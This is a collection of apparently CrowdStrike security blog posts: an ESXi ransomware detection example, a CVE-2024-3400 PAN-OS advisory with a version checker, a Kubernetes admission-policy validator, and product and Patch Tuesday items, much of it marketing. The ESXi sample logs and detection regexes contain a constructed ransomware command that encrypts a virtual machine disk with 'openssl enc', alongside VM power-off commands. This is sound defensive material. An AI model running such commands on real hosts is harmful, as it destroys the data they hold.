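The three detections described in this post (openssl enc run against virtual machine files, SSH being enabled on a host, and a management login from a known-malicious IP) can be expressed in a few dozen lines once the logs are forwarded. The following Python is an added example, not Falcon Next-Gen SIEM logic or CrowdStrike code: it parses a small constructed batch of syslog-style ESXi lines (sshd, shell, vobd and hostd; the formats approximate real ESXi logs but are not captured data), raises an alert only for the high-confidence events, keeps the lower-confidence shell activity on the same host as incident context, and deduplicates alerts across overlapping scheduled-search windows. The IOC list is a constructed stand-in for a threat-intelligence feed.

```python
import re
from dataclasses import dataclass

# Constructed sample of syslog-forwarded ESXi lines; formats approximate
# real sshd/shell/vobd/hostd output and are not captured data.
SAMPLE_LOGS = """\
2024-04-10T02:13:05Z esx01 sshd[2001]: Accepted keyboard-interactive/pam for root from 203.0.113.7 port 51544 ssh2
2024-04-10T02:13:09Z esx01 shell[2007]: [root]: vim-cmd vmsvc/getallvms
2024-04-10T02:13:40Z esx01 shell[2007]: [root]: vim-cmd vmsvc/power.off 12
2024-04-10T02:14:02Z esx01 shell[2007]: [root]: openssl enc -in /vmfs/volumes/ds1/fs01/fs01-flat.vmdk -out /vmfs/volumes/ds1/fs01/fs01-flat.vmdk.enc
2024-04-10T02:20:11Z esx02 shell[3100]: [admin]: esxcli storage filesystem list
2024-04-10T02:21:00Z esx02 vobd[1022]: [esx.audit.ssh.enabled] SSH access has been enabled.
2024-04-10T02:22:31Z esx02 hostd[1501]: Event 801 : User root@198.51.100.23 logged in as VMware-client/7.0
"""

# Constructed stand-in for an integrated threat-intelligence IOC feed.
MALICIOUS_IPS = {"203.0.113.7"}

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>[^\[\s]+)\[\d+\]: (?P<msg>.*)$")
SHELL_CMD_RE = re.compile(r"^\[(?P<user>[^\]]+)\]: (?P<cmd>.+)$")
SSH_LOGIN_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>[\d.]+)")
HOSTD_LOGIN_RE = re.compile(r"User (?P<user>[^@\s]+)@(?P<ip>[\d.]+) logged in")
OPENSSL_ENC_RE = re.compile(r"\bopenssl\s+enc\b")
VM_PATH_RE = re.compile(r"/vmfs/volumes/\S+")


@dataclass(frozen=True)   # frozen so alerts are hashable for deduplication
class Alert:
    severity: str
    host: str
    ts: str
    reason: str


def parse_line(line):
    """Split one syslog line into timestamp, host, process and message."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(ev):
    """Return an Alert for one event, or None when it is only context."""
    proc, msg = ev["proc"], ev["msg"]
    if proc == "shell":
        cm = SHELL_CMD_RE.match(msg)
        # openssl enc on a datastore path is the high-confidence signal; VM
        # enumeration and power-off commands alone are context, not alerts.
        if cm and OPENSSL_ENC_RE.search(cm["cmd"]) and VM_PATH_RE.search(cm["cmd"]):
            return Alert("high", ev["host"], ev["ts"], "openssl enc on VM files: " + cm["cmd"])
        return None
    if proc == "vobd" and "esx.audit.ssh.enabled" in msg:
        # Auditable posture change: confirm with the owner or treat as an early sign.
        return Alert("medium", ev["host"], ev["ts"], "SSH access enabled")
    for rx in (SSH_LOGIN_RE, HOSTD_LOGIN_RE):
        lm = rx.search(msg)
        if lm and lm["ip"] in MALICIOUS_IPS:
            return Alert("high", ev["host"], ev["ts"],
                         f"login as {lm['user']} from known-malicious IP {lm['ip']}")
    return None


def run_detections(log_text):
    """Return (alerts, context): alerts in log order, plus the non-alerting
    shell commands per host that an incident should carry as surrounding activity."""
    alerts, context = [], {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        alert = classify(ev)
        if alert:
            alerts.append(alert)
        elif ev["proc"] == "shell":
            cm = SHELL_CMD_RE.match(ev["msg"])
            if cm:
                context.setdefault(ev["host"], []).append(cm["cmd"])
    return alerts, context


def new_alerts(alerts, seen):
    """Overlapping scheduled-search windows re-read the same lines; return only
    alerts not already in `seen` (a set the caller persists between runs)."""
    fresh = [a for a in alerts if a not in seen]
    seen.update(fresh)
    return fresh


if __name__ == "__main__":
    found, ctx = run_detections(SAMPLE_LOGS)
    for a in found:
        print(a.severity.upper(), a.host, a.ts, a.reason)
    print("context:", ctx)
```

The split between `classify` (alert-worthy) and the context list mirrors the post's point that listing and shutting down VMs is normal on its own but belongs in the incident once a high-confidence event fires on the same host.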

Figure 5. Detection of a login from a malicious IP (click to enlarge)

CrowdStrike Falcon Next-Gen SIEM Exposes Ransomware Targeting ESXi 

By leveraging Falcon Next-Gen SIEM, you can provide your organization with multiple layers of detections, get unparalleled visibility into your ESXi infrastructure and get ahead of adversaries. Falcon Next-Gen SIEM leaves adversaries targeting ESXi environments with nowhere to hide, detecting suspicious behavior as early as possible, preventing attacks and stopping breaches.

Sources

  1. https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/
  2. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
  3. https://www.crowdstrike.com/blog/tech-center/importing-logs-log-collector/
  4. https://kb.vmware.com/s/article/2003322

CVE-2024-3400: What You Need to Know About the Critical PAN-OS Zero-Day

12 April 2024 at 22:29

UPDATE: It has been confirmed that disabling telemetry will not block this exploit. Applying a patch as soon as possible is the most effective remediation for this vulnerability. Patches for 8 of the 18 vulnerable versions have been released; patches for the remaining vulnerable versions are expected by April 19th.

CrowdStrike is constantly working to protect our customers from the newest and most advanced cybersecurity threats. We are actively monitoring activity related to CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks’ PAN-OS software affecting “specific PAN-OS versions and distinct feature configurations,” the vendor says.

This vulnerability, which has been given a CVSSv4.0 score of 10 by the vendor, has been observed being exploited in the wild. If exploited, CVE-2024-3400 could allow an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. At the time of writing, there is no patch available. Palo Alto Networks says a patch will be ready by April 14, 2024. 

Here, we explain how customers of the CrowdStrike Falcon® platform can assess their risk exposure to this vulnerability. Customers should also monitor the vendor’s website for up-to-date information on vulnerable product versions, mitigations and available patches.

Assessing Risk Exposure to CVE-2024-3400

When a new and actively exploited vulnerability is reported, one of the first actions security teams must take is determining their exposure to the issue. Understanding which of their internet-exposed assets could potentially be affected by the vulnerability is the first step to understanding exposure — and clear visibility into internet-facing devices is essential.

After identifying potentially vulnerable assets, the next step is to understand if the exposed assets have the required conditions for the vulnerability to be present. 

According to the vendor information, some of the most recent PAN-OS versions (listed below) are affected. An asset will be affected if the GlobalProtect gateways and device telemetry are enabled. If these features are not enabled, this vulnerability cannot be exploited.

Version        Vulnerable Version      Fixed Version   Estimated Patch Release Date
PAN-OS 11.1.2  Less than 11.1.2-h3     11.1.2-h3       04/14/2024
PAN-OS 11.1.1  Less than 11.1.1-h1     11.1.1-h1       04/16/2024
PAN-OS 11.1.0  Less than 11.1.0-h3     11.1.0-h3       04/16/2024
PAN-OS 11.0.4  Less than 11.0.04-h1    11.0.04-h1      04/14/2024
PAN-OS 11.0.3  Less than 11.0.03-h10   11.0.03-h1      04/16/2024
PAN-OS 11.0.2  Less than 11.0.02-h4    11.0.02-h4      04/16/2024
PAN-OS 11.0.1  Less than 11.0.01-h4    11.0.01-h4      04/17/2024
PAN-OS 11.0.0  Less than 11.0.00-h3    11.0.00-h3      04/18/2024
PAN-OS 10.2.9  Less than 10.2.9-h1     10.2.9-h1       04/14/2024
PAN-OS 10.2.8  Less than 10.2.8-h3     10.2.8-h3       04/15/2024
PAN-OS 10.2.7  Less than 10.2.7-h8     10.2.7-h8       04/15/2024
PAN-OS 10.2.6  Less than 10.2.6-h3     10.2.6-h3       04/16/2024
PAN-OS 10.2.5  Less than 10.2.5-h6     10.2.5-h6       04/16/2024
PAN-OS 10.2.4  Less than 10.2.4-h16    10.2.4-h16      04/19/2024
PAN-OS 10.2.3  Less than 10.2.3-h13    10.2.3-h13      04/17/2024
PAN-OS 10.2.2  Less than 10.2.2-h5     10.2.2-h5       04/18/2024
PAN-OS 10.2.1  Less than 10.2.1-h2     10.2.1-h2       04/17/2024
PAN-OS 10.2.0  Less than 10.2.0-h3     10.2.0-h3       04/18/2024

Table 1. PAN-OS versions vulnerable to CVE-2024-3400
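Checking an inventory against Table 1 by hand is error-prone because hotfix levels sort numerically (h10 is newer than h9) and some versions are zero-padded. The following Python is an added example, not CrowdStrike or vendor code: it transcribes the "Vulnerable Version" thresholds from Table 1, parses PAN-OS version strings into comparable tuples, and flags an asset as exposed only when its version is below the threshold for its base version and the GlobalProtect gateway feature is enabled. Consistent with the UPDATE at the top of this post, telemetry state is deliberately not treated as a mitigating condition. The inventory records are constructed.

```python
import re

# Thresholds from the "Vulnerable Version" column of Table 1 above: an
# appliance on one of these base versions is vulnerable when its version
# sorts below the listed value.
VULNERABLE_BELOW = [
    "11.1.2-h3", "11.1.1-h1", "11.1.0-h3",
    "11.0.04-h1", "11.0.03-h10", "11.0.02-h4", "11.0.01-h4", "11.0.00-h3",
    "10.2.9-h1", "10.2.8-h3", "10.2.7-h8", "10.2.6-h3", "10.2.5-h6",
    "10.2.4-h16", "10.2.3-h13", "10.2.2-h5", "10.2.1-h2", "10.2.0-h3",
]

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(text):
    """'11.0.04-h1' -> (11, 0, 4, 1). A missing hotfix counts as 0 and
    zero-padded components compare as plain integers."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {text!r}")
    major, minor, patch, hotfix = m.groups()
    return (int(major), int(minor), int(patch), int(hotfix or 0))


# base version tuple -> first version that is not vulnerable
THRESHOLDS = {parse_version(v)[:3]: parse_version(v) for v in VULNERABLE_BELOW}


def is_vulnerable(version, globalprotect_gateway_enabled=True):
    """True when the version is in an affected range and the GlobalProtect
    gateway is enabled. Unknown gateway state defaults to enabled (conservative)."""
    parsed = parse_version(version)
    threshold = THRESHOLDS.get(parsed[:3])
    if threshold is None or not globalprotect_gateway_enabled:
        return False
    return parsed < threshold


def find_exposed(assets):
    """Names of assets (in inventory order) that still need the vendor patch."""
    return [a["name"] for a in assets
            if is_vulnerable(a["version"], a.get("globalprotect_gateway", True))]


# Constructed inventory for the example; hostnames and versions are made up.
SAMPLE_INVENTORY = [
    {"name": "fw-dc-01", "version": "10.2.7-h5", "globalprotect_gateway": True},
    {"name": "fw-dc-02", "version": "10.2.7-h8", "globalprotect_gateway": True},
    {"name": "fw-branch-02", "version": "11.0.4", "globalprotect_gateway": True},
    {"name": "fw-lab-01", "version": "11.1.2-h1", "globalprotect_gateway": False},
    {"name": "fw-legacy", "version": "9.1.16", "globalprotect_gateway": True},
]

if __name__ == "__main__":
    print("exposed:", find_exposed(SAMPLE_INVENTORY))
```

Note that `fw-legacy` is not flagged only because its base version is absent from Table 1; an inventory entry outside the listed ranges should still be checked against the vendor advisory rather than assumed safe.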

CrowdStrike Falcon Exposure Management customers can quickly identify exposed PAN-OS assets in their environments by filtering directly from the external attack surface management capability. This will help customers quickly identify all of the potential exposures, thereby proactively reducing the impact of a potential exploitation.

Filter    Value          Expected Result
Banner    GlobalProtect  All devices that return a GlobalProtect Banner
Platform  PAN-OS         All devices that are on a PAN-OS platform

Table 2. Falcon Exposure Management query filters to detect CVE-2024-3400

NOTE: The two filters listed above should be used independently as using them in tandem will likely net 0 results.

As pictured below, Falcon Exposure Management customers can broaden their search for all Palo Alto Networks devices by selecting the platform “PAN-OS,” enabling them to locate firewalls running the vulnerable version of GlobalProtect.

How Many Assets Could Be Affected?

Customers of CrowdStrike Falcon® Counter Adversary Operations who would like to identify the total number of potentially vulnerable internet-exposed assets can navigate to “External attack surface explore” located in the “External monitoring” section of the Counter Adversary Operations menu. There, they can use some of the following filters to view other PAN-OS assets visible on the broader internet:

Query:
  attributes_raw contains (Phrase) ‘Palo Alto Networks PA-200 series’ or banners_raw contains (Phrase) ‘GlobalProtect Portal’
Expected result:
  Returns any device whose attributes contain the phrase “Palo Alto Networks PA-200 series” or that returns the phrase “GlobalProtect Portal” in the HTML banner

Query:
  platform.name contains (Phrase) ‘Pan-os’
Expected result:
  Returns any device with “PAN-OS” in its platform name

Query:
  ‘cpe:/a:paloaltonetworks:pan-os’
Expected result:
  Returns any device that is noted as having PAN-OS installed

Table 3. Queries for detecting possible vulnerable assets in “External attack surface explore,” an external monitoring feature in Counter Adversary Operations

Figure 3. Example response from “External attack surface explore”

Conclusion and Recommendations

Critical vulnerabilities, especially those actively exploited, pose a high risk to organizations. In order to mitigate the risk of exploitation, those affected by CVE-2024-3400 are advised to update vulnerable appliances with the vendor-supplied patch. Patches for 8 of the 18 vulnerable versions have been released, and patches for the remaining vulnerable versions are expected by April 19th. In addition, it is advised to increase monitoring of vulnerable appliances as well as non-vulnerable assets potentially accessible by the appliance.

Our product and internal security teams continue to actively monitor this dynamic and ongoing situation. CrowdStrike will continue to take additional steps, including mitigation and patching. As new information becomes available, we will publish updates as necessary. In tandem, we continue to develop and release new behavioral logic for the Falcon platform to detect and prevent malicious behavior related to CVE-2024-3400. 

CrowdStrike Falcon Wins Best EDR Annual Security Award in SE Labs Evaluations

12 April 2024 at 20:36
  • CrowdStrike wins third consecutive Best Endpoint Detection and Response 2024 Award from SE Labs
  • The award recognizes that the CrowdStrike Falcon® platform demonstrates consistent results in detecting real-world adversary tradecraft, both in SE Labs testing and in real-world scenarios
  • CrowdStrike remains committed to participating in independent testing that provides transparency into the Falcon platform’s AI-native detection and automated prevention capabilities 

The CrowdStrike Falcon platform has received the Best Endpoint Detection and Response 2024 Award from SE Labs for the third consecutive year. This award honors CrowdStrike’s leadership in demonstrated detection, prevention and investigation capabilities. This repeat performance is made possible by CrowdStrike’s unified, AI-native platform, which delivers unsurpassed protection through a single lightweight agent and console, fueled by CrowdStrike’s petabytes of cross-domain intelligence and award-winning threat intelligence and advanced AI and machine learning capabilities. The recognition also highlights our continued commitment to transparency in public testing.

In describing the significance of this award, SE Labs notes:

The best security involves having a good understanding of your enemy and the extent of the impact they could make (or have already made) on your IT infrastructure. Endpoint Detection and Response are the boots on the ground when it comes to seeing, stopping and investigating cyber threats on the network. A great solution makes it easier for security teams to be more effective.

The SE Labs Best Endpoint Detection and Response 2024 Award reflects CrowdStrike’s consistent, year-long testing results in detecting real-world attacker behavior with the highest protection accuracy during SE Labs EDR tests. In the ransomware-specific testing, the Falcon platform detected and blocked all attacks to achieve a 100% ransomware protection score.

In addition, as part of this award, SE Labs incorporates results reported by customers. To earn this third straight win, the Falcon platform showed that it delivers best-in-class results during sophisticated lab-based testing and in real-world engagements. From ransomware to sophisticated attack chains, the Falcon platform defends against attacks at every stage, neutralizing adversaries.

An Adversarial Approach to Testing Endpoint Detection and Response

SE Labs Endpoint Detection and Response testing involves using current threat intelligence on known and relevant adversaries to build similar attack chains in a practice known as adversary emulation. This involves replicating tradecraft from sophisticated adversaries such as Turla, Ke3chang, Threat Group-3390 and Kimsuky to make test cases as similar as possible to real-life engagements. The intent behind these attacks is to infiltrate systems and breach target networks, realistically mirroring the methods that adversaries use to compromise systems. 

Ransomware is a big part of SE Labs’ testing. It inflicts damages totaling billions of dollars and it’s increasingly used for extortion by big game hunting (BGH) adversaries — the number of data theft victims named on BGH dedicated leak sites spiked by 76% year-over-year in 2023, as detailed in the CrowdStrike 2024 Global Threat Report.

It is critical to test EDR vendors’ ability to detect the tactics of cybercriminal ransomware groups, as well as known and unknown ransomware. By creating attack chains that replicate tactics — such as the use of stolen identities or lateral movement — and using ransomware samples employing typical methods like phishing, these ransomware-specific EDR tests are meant to evaluate whether security vendors can detect and protect businesses against real-world scenarios.

Throughout 2023, SE Labs included realistic adversary tradecraft in its EDR attack chains, as well as real-world tactics used by ransomware operators, to evaluate detection and prevention capabilities. The ransomware-specific test involved 615 ransomware variants from 10 different ransomware families being employed in sophisticated attacks mimicking the tradecraft of real-world adversaries.

The SE Labs Best Endpoint Detection and Response 2024 Award stands as a unique accolade in the industry, recognizing practical success in seeing, stopping and investigating advanced threats by understanding adversary behaviors.

CrowdStrike Extends Identity Security Capabilities to Stop Attacks in the Cloud

10 April 2024 at 17:00

Two recent Microsoft breaches underscore the growing problem of cloud identity attacks and why it’s critical to stop them. 

While Microsoft Active Directory (AD) remains a prime target for attackers, cloud identity stores such as Microsoft Entra ID are also a target of opportunity. The reason is simple: Threat actors increasingly seek to mimic legitimate users in the target system. They can just as easily abuse identities from cloud identity providers as they can in on-premises AD environments.

Identity providers and Zero Trust network access solutions offer some capabilities to prevent cloud identity attacks — however, they often lack visibility across the identity landscape spanning on-premises and cloud identity providers, creating gaps that adversaries can exploit.

This blog shares how the failure to secure cloud identities can result in a breach and how recently released innovations in CrowdStrike Falcon® Identity Protection can stop identity attacks in the cloud.

Get a free CrowdStrike Identity Security Risk Review to get instant visibility into your current Microsoft Entra ID, Active Directory and Okta environments.

CSRB Report Shows the Importance of Identity Security

The Summer 2023 Microsoft breach deconstructed by the U.S. Cyber Safety Review Board (CSRB) in a recent landmark report of the incident shows why identity threat detection and response is critical. 

Last May, a nation-state adversary compromised the Microsoft Exchange Online mailboxes of 22 organizations and over 500 individuals around the world. The threat actor accessed the accounts using authentication tokens signed by a key that Microsoft had created in 2016. “A single key’s reach can be enormous, and in this case the stolen key had extraordinary power,” said the CSRB. When combined with another flaw in Microsoft’s authentication system, the key allowed the adversary to gain full access to essentially any Exchange Online account anywhere in the world.

The CSRB found “this intrusion was preventable and should never have occurred” and offered several recommendations to ensure an intrusion of this magnitude doesn’t happen again. Two stood out:

  1. Cloud service providers should implement modern control mechanisms and baseline practices, informed by a rigorous threat model, across their digital identity and credential systems to substantially reduce the risk of system-level compromise.
  2. Cloud service providers should implement emerging digital identity standards to secure cloud services against prevailing threat vectors. Relevant standards bodies should refine, update, and incorporate these standards to address digital identity risks commonly exploited in the modern threat landscape.

While these CSRB recommendations are targeted toward cloud service providers (CSPs), given the Cloud Shared Responsibility Model, customers can’t rely solely on CSPs to stop breaches. Organizations need to lock down identities by layering in proactive identity protections across their hybrid identity environments. 

More recently, COZY BEAR, a Russia state-nexus adversary, conducted high-profile attacks on Microsoft’s corporate systems. This Microsoft breach involved common identity techniques like password spraying and credential scanning, and compromised corporate email accounts, including those of Microsoft’s senior leadership team.

What these two Microsoft identity breaches show is that adversaries are weaponizing identities. If you don’t have modern identity security, your organization may be at risk of a breach. 

New Identity Protections to Stop Breaches in the Cloud

CrowdStrike offers the industry’s only unified platform for identity threat protection and endpoint security, powered by rich threat intelligence and adversary tradecraft. Recent enhancements to CrowdStrike Falcon® Identity Protection help customers better protect against modern identity attacks in the cloud.

While individual IAM and identity-as-a-service (IDaaS) systems provide user authentication, they lack the visibility into hybrid lateral movement and intelligence about adversary tradecraft to detect identity attacks across cloud and on-premises environments. Falcon Identity Protection not only has direct visibility into AD through the lightweight Falcon sensor, it also has pre-configured IDaaS connectors that give customers direct visibility into identity activity across cloud identity providers such as Entra ID and Okta. 

By correlating context from the authentication event, Falcon Identity Protection can detect if a user’s web-authenticated session is maliciously hijacked or other malicious web-based activity has occurred. The solution also provides workflows to take direct action, such as disabling an account, revoking a session and refreshing tokens, and updating the access policy in Entra ID to stop the attack. 

IAM and IDaaS systems are not only blind to cloud identity attacks, but due to their siloed nature they also lack the ability to deliver response actions to stop the adversary in a different cloud identity provider. As an IAM vendor-agnostic solution, Falcon Identity Protection spans multiple cloud identity providers to comprehensively stop adversaries.  

Customers can now defend against sophisticated identity-based threats with CrowdStrike Falcon® Adversary OverWatch’s new identity threat hunting capability. This 24/7 managed service, powered by AI and human expertise, utilizes telemetry from Falcon Identity Protection to disrupt adversaries across endpoint, identity and cloud. 

Take a Free Identity Security Risk Review 

Curious about your identity security posture? CrowdStrike’s complimentary Identity Security Risk Review provides a 1:1 session with a CrowdStrike identity threat expert to help you evaluate your hybrid identity security posture and uncover any potential risks. 

The risk review can be completed quickly and gives you:

  • Instant visibility into the identity security posture across your hybrid identity environment
  • Deep insights into possible attack paths that adversaries can exploit, and expert advice on how to address them
  • An understanding of how to protect your organization from modern identity-based attacks like ransomware, account takeover, hybrid lateral movement and Pass-the-Hash. 

April 2024 Patch Tuesday: Three Critical RCE Vulnerabilities in Microsoft Defender for IoT

Microsoft has released security updates for 150 vulnerabilities in its April 2024 Patch Tuesday rollout, a much larger number than in recent months. There are three Critical remote code execution vulnerabilities (CVE-2024-21322, CVE-2024-21323 and CVE-2024-29053), all of which are related to Microsoft Defender for IoT, Microsoft’s security platform for IoT devices. 

April 2024 Risk Analysis

This month’s leading risk type is remote code execution (RCE), accounting for 44%, followed by elevation of privilege (21%) and security feature bypass (19%).

Figure 1. Breakdown of April 2024 Patch Tuesday attack types

Windows products received the most patches this month with 91, followed by Extended Security Update (ESU) with 62 and SQL Server with 38. This represents a consistent uptick in vulnerabilities identified in Extended Support products. In order to ensure the security of endpoints, upgrade to a supported version or purchase Extended Support from the vendor.

Figure 2. Breakdown of product families affected by April 2024 Patch Tuesday

Critical Remote Code Execution Vulnerabilities Affect Microsoft Defender for IoT  

CVE-2024-21323 is a Critical RCE vulnerability affecting Microsoft Defender for IoT and has a CVSS score of 8.8. Successful exploitation of this vulnerability would allow an attacker to send malicious update files to the Defender for IoT sensor, allowing the attacker to overwrite any file on the managed asset. This vulnerability requires the attacker to be authenticated into the IoT sensor with just enough permissions to begin the update process. Any IoT device with the Defender sensor deployed should be updated as soon as possible.

CVE-2024-29053 is another Critical RCE vulnerability that affects the Microsoft Defender for IoT platform and has a CVSS score of 8.8. Successful exploitation of this vulnerability could allow an unauthenticated attacker to upload malicious files to sensitive locations on the server appliance. Leveraging this vulnerability, the attacker could override any files including sensitive ones, thereby disrupting normal operation or inhibiting visibility into the IoT network.

CVE-2024-21322 is yet another Critical RCE vulnerability affecting Microsoft Defender for IoT and has a CVSS score of 7.2. Successful exploitation of this vulnerability would allow the attacker to send arbitrary commands to the managed device, possibly impeding normal functioning of the Defender for IoT monitoring software. This vulnerability requires the attacker to be an administrator of the management console of Defender for IoT on the web. Regular audits and validation of such accounts should be performed to limit risk. 

Severity  CVSS Score  CVE             Description
Critical  8.8         CVE-2024-21323  Microsoft Defender for IoT Remote Code Execution Vulnerability
Critical  8.8         CVE-2024-29053  Microsoft Defender for IoT Remote Code Execution Vulnerability
Critical  7.2         CVE-2024-21322  Microsoft Defender for IoT Remote Code Execution Vulnerability

Table 1. Critical vulnerabilities in Microsoft Defender for IoT

Not All Relevant Vulnerabilities Have Patches: Consider Mitigation Strategies

As we have learned with other notable vulnerabilities, such as Log4j, not every highly exploitable vulnerability can be easily patched. As is the case for the ProxyNotShell vulnerabilities, it’s critically important to develop a response plan for how to defend your environments when no patching protocol exists. 

Regular review of your patching strategy should still be a part of your program, but you should also look more holistically at your organization’s methods for cybersecurity to improve your overall security posture. 

The CrowdStrike Falcon® platform regularly collects and analyzes trillions of endpoint events every day from millions of sensors deployed across 176 countries. Watch this demo to see the Falcon platform in action.

Learn More

Learn more about how CrowdStrike Falcon® Exposure Management can help you quickly and easily discover and prioritize vulnerabilities and other types of exposures here.

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article.

Additional Resources

CrowdStrike and Google Cloud Expand Strategic Partnership to Deliver Unified Cloud Security

9 April 2024 at 11:52

CrowdStrike and Google Cloud today debuted an expanded strategic partnership with a series of announcements that demonstrate our ability to stop cloud breaches with industry-leading AI-powered protection. These new features and integrations are built to protect Google Cloud and multi-cloud customers against adversaries that are increasingly targeting cloud environments.

At a time when cloud intrusions are up 75% year-over-year and adversaries continue to gain speed and stealth, organizations must adjust their security strategies to stay ahead. They need a unified security platform that removes complexity and empowers security and DevOps teams. As organizations navigate the evolving threat and technology landscapes, they turn to providers like CrowdStrike for best-in-class protection from code to cloud, delivered through a unified platform.

Today we are announcing that CrowdStrike is bringing industry-leading breach protection with integrated offerings like CrowdStrike Falcon® Cloud Security, CrowdStrike Falcon® Next-Gen SIEM, CrowdStrike Falcon® Identity Protection and CrowdStrike Falcon endpoint protection bundles as preferred vendor products on Google Cloud Marketplace, accelerating time-to-value and our unified platform adoption for all Google Cloud customers. Now, more businesses than ever will have access to industry-leading security to protect their growing environments from the most advanced threats they face.

But that’s not all. CrowdStrike is innovating and leading to address the critical cloud security needs of today’s organizations by empowering them with unified visibility across their cloud environments, industry-leading threat detection and response, the ability to secure the application life cycle and prioritize remediation, and shift-left capabilities to prevent security issues early in development. Together with Google, we’re bringing these benefits to Google Cloud customers to stop breaches and protect their cloud environments from modern threats.

Below are some key announcements we’re excited to make at Google Cloud Next ’24.

Deeper Integrations

CrowdStrike Supports Google Cloud Run: CrowdStrike is providing support for organizations seeking to pair Google Cloud Run with Falcon Cloud Security. Today, we’re announcing deeper integrations and support for Google Cloud Run. Customers using Google Cloud Run to automatically scale containerized workloads and build container images will be able to secure those processes with Falcon Cloud Security, expanding their coverage and gaining world-class security at the speed of DevOps.

CrowdStrike Supports GKE Autopilot: Falcon Cloud Security now supports Google Kubernetes Engine (GKE) Autopilot, a critical automation tool for Kubernetes cluster deployments. Organizations operating with lean teams and resources can use GKE Autopilot and Falcon Cloud Security to identify critical risks, remediate them faster and run their business more efficiently.

Faster Breach Protection 

OS Configuration Support: Falcon Cloud Security will be able to support a single-click agent deployment to customers in Google Cloud with OS Config support. This support provides customers with a simple way to deploy the CrowdStrike Falcon® sensor across Google Cloud workloads for real-time visibility and breach protection in the cloud.

Figure 1. Falcon Cloud Security’s OS Config agent deployment process made easy

Enhanced Productivity

Falcon Cloud Security Kubernetes Admission Controller: Falcon Cloud Security is now the only cloud security tool on the market with a Kubernetes admission controller as part of a complete code-to-cloud, cloud-native application protection platform (CNAPP). Kubernetes admission controllers simplify the lives of DevSecOps teams by preventing non-compliant containers from deploying and allowing DevSecOps teams to easily stop frustrating crash loops — which cost developers and security teams valuable time — without writing complex Rego rules.
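To make concrete what a validating admission controller actually decides, here is an added example that is not the Falcon Cloud Security admission controller nor any CrowdStrike code. It implements the core of a validating webhook in plain Python: it takes the AdmissionReview object the Kubernetes API server sends for a Pod and returns an AdmissionReview response that either admits the Pod or rejects it with a list of policy violations. The policy itself (no host namespaces, no privileged containers, no privilege escalation, images pinned by digest) and the sample Pods are assumptions constructed for this example; the HTTP/TLS serving layer is omitted so the decision logic runs offline.

```python
"""Validating admission logic for Kubernetes Pods (hypothetical example).

This is NOT the Falcon Cloud Security admission controller. It shows the
decision a validating webhook makes on an AdmissionReview v1 request and
the response shape the API server expects back. The serving layer (HTTPS
endpoint, TLS, webhook registration) is deliberately left out.
"""
from typing import Dict, List

# Constructed placeholder digest for the sample "good" image; not a real image.
PINNED_IMAGE = "registry.example.internal/app:1.4.2@sha256:" + "0" * 64


def violations(pod: Dict) -> List[str]:
    """Return every policy violation found in a Pod manifest (empty = compliant)."""
    found: List[str] = []
    spec = pod.get("spec", {})

    # Host namespaces give a container a view of the node's network/PIDs/IPC.
    if spec.get("hostNetwork") or spec.get("hostPID") or spec.get("hostIPC"):
        found.append("pod shares a host namespace (hostNetwork/hostPID/hostIPC)")

    for c in spec.get("containers", []) + spec.get("initContainers", []):
        name = c.get("name", "<unnamed>")
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            found.append(f"container {name!r} is privileged")
        # Kubernetes defaults allowPrivilegeEscalation to true when unset.
        if sc.get("allowPrivilegeEscalation", True):
            found.append(f"container {name!r} allows privilege escalation")
        image = c.get("image", "")
        if "@sha256:" not in image:
            found.append(f"container {name!r} image {image!r} is not pinned by digest")
    return found


def review(admission_review: Dict) -> Dict:
    """Build the AdmissionReview response for one incoming request."""
    req = admission_review["request"]
    if req.get("kind", {}).get("kind") != "Pod":
        allowed, message = True, "not a Pod; no policy applies"
    else:
        found = violations(req.get("object") or {})
        allowed = not found
        message = "admitted" if allowed else "; ".join(found)
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": {
            "uid": req["uid"],          # must echo the request uid
            "allowed": allowed,
            "status": {"code": 200 if allowed else 403, "message": message},
        },
    }


def make_review(pod: Dict, uid: str = "00000000-0000-4000-8000-000000000001") -> Dict:
    """Wrap a Pod manifest in a constructed AdmissionReview request."""
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "request": {"uid": uid, "kind": {"group": "", "version": "v1", "kind": "Pod"},
                    "operation": "CREATE", "object": pod},
    }


# Constructed sample Pods: one that would be blocked, one that would be admitted.
BAD_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "debug"},
           "spec": {"hostPID": True,
                    "containers": [{"name": "shell", "image": "nginx:latest",
                                    "securityContext": {"privileged": True}}]}}

GOOD_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "app"},
            "spec": {"containers": [{"name": "app", "image": PINNED_IMAGE,
                                     "securityContext": {"privileged": False,
                                                         "allowPrivilegeEscalation": False}}]}}

if __name__ == "__main__":
    for pod in (BAD_POD, GOOD_POD):
        resp = review(make_review(pod))["response"]
        print(pod["metadata"]["name"], "->", "allowed" if resp["allowed"] else "denied:", resp["status"]["message"])
```

Rejecting at admission time, rather than after a container starts, is what keeps a non-compliant workload from ever entering a crash loop or running with more privilege than intended; a real controller would also apply these checks to Deployment, DaemonSet and Job templates so the violation is reported to the person who submitted the manifest.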

Figure 2. Falcon Cloud Security’s Kubernetes admission controller policies screen


Google Workspace Bundles: CrowdStrike is now providing support to secure the millions of customers using the Google Workspace productivity suite with CrowdStrike’s leading endpoint security and next-generation antivirus protection.

Figure 3. Falcon Cloud Security containers dashboard

